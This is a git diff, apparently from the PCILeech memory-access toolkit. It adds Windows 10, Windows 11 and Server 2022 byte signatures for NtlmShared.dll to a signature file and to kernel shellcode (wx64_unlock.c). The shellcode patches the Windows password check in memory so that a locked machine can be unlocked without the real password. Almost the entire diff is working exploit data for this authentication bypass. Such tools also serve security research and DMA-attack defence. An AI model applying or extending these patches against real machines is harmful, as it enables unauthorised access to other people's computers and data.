diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig index c2639a0..e4ae1e3 100644 --- a/files/unlock_win10x64.sig +++ b/files/unlock_win10x64.sig @@ -34,4 +34,20 @@ 741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF # # signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1] -426,48FF155320,435,0F84BAFAFFFF,435,0F85 \ No newline at end of file +426,48FF155320,435,0F84BAFAFFFF,435,0F85 +# +# signature for Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889] +4B6,48FF15C31F,4C5,0F84BAFAFFFF,4C5,0F85 +# +# signature for Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887] +A6E,48FF15B328,A7D,0F84B2FAFFFF,A7D,0F85 +# +# signature for Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1] +F8B,488BCB48FF,F9D,0F84B2FAFFFF,F9D,0F85 +# +# signature for Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856] +00B,488BCB48FF,01D,0F84B2FAFFFF,01D,0F85 +# +# signature for Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382] +# signature for Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608] +FBD,48FF153C23,FCC,0F85C4FAFFFF,FCC,0F85 diff --git a/includes/lib64/vmm.lib b/includes/lib64/vmm.lib index f4dcf22..65a45e9 100644 Binary files a/includes/lib64/vmm.lib and b/includes/lib64/vmm.lib differ diff --git a/includes/vmmdll.h b/includes/vmmdll.h index 63f2931..a572dd2 100644 --- a/includes/vmmdll.h +++ b/includes/vmmdll.h @@ -186,6 +186,7 @@ VOID VMMDLL_MemFree(_Frees_ptr_opt_ PVOID pvMem); #define VMMDLL_OPT_CORE_VERBOSE_EXTRA 0x4000000300000000 // RW #define VMMDLL_OPT_CORE_VERBOSE_EXTRA_TLP 0x4000000400000000 // RW #define VMMDLL_OPT_CORE_MAX_NATIVE_ADDRESS 0x4000000800000000 // R +#define VMMDLL_OPT_CORE_LEECHCORE_HANDLE 0x4000001000000000 // R - underlying leechcore handle (do not close). #define VMMDLL_OPT_CORE_SYSTEM 0x2000000100000000 // R #define VMMDLL_OPT_CORE_MEMORYMODEL 0x2000000200000000 // R diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c index ff433ed..509387f 100644 --- a/pcileech_shellcode/wx64_unlock.c +++ b/pcileech_shellcode/wx64_unlock.c @@ -129,7 +129,7 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages return E_FAIL; } -#define NUMBER_OF_SIGNATURES 15 +#define NUMBER_OF_SIGNATURES 20 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = { @@ -223,7 +223,38 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) {.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } }, {.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } }, {.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } } - } + }, + // Windows 10 x64 [NtlmShared.dll (2022-08-04)/10.0.19041.1889] + {.chunk = { + {.cbOffset = 0x4B6,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xc3, 0x1f } }, + {.cbOffset = 0x4c5,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0x4c5,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, + // Windows Server2022 x64 [NtlmShared.dll (2022-08-04)/10.0.20348.887] + {.chunk = { + {.cbOffset = 0xa6e,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0xb3, 0x28 } }, + {.cbOffset = 0xa7d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0xa7d,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, + // Windows 11 x64 [NtlmShared.dll (2021-06-05)/10.0.22000.1] + { .chunk = { + {.cbOffset = 0xf8b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } }, + {.cbOffset = 0xf9d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0xf9d,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, + // Windows 11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856] + { .chunk = { + {.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } }, + {.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, + // Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382] + // Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608] + { .chunk = { + {.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } }, + {.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, }; KERNEL_FUNCTIONS2 fnk2; PPHYSICAL_MEMORY_RANGE pMemMap, pMM;